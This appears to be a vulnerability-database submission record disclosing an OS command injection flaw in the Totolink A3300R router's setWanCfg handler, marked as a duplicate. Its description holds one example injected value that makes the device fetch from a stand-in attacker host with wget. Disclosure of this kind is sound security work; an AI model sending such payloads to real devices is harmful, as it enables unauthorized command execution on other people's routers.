Submit #792631: Totolink A3300R V17.0.0cu.557_B20221024 OS Command Injectioninfo

TitleTotolink A3300R V17.0.0cu.557_B20221024 OS Command Injection
DescriptionA command injection vulnerability exists in /cgi-bin/cstecgi.cgi when handling topicurl=setWanCfg. The dhcpMtu parameter is copied into a system command through Uci_Set_Str and command formatting logic (sprintf), then executed via CsteSystem/execv without proper sanitization. A crafted value such as 1500$(wget http://attacker/testpoc) can trigger arbitrary command execution on the device.
Source⚠️ https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-dhcp-mtu-cmd-injection
User
 Svigo_o (UID 95970)
Submission03/30/2026 04:54 (13 days ago)
Moderation04/06/2026 11:42 (7 days later)
StatusDuplicate
VulDB entry250459 [Totolink A3300R 17.0.0cu.557_B20221024 setWanCfg Hostname command injection]
Points0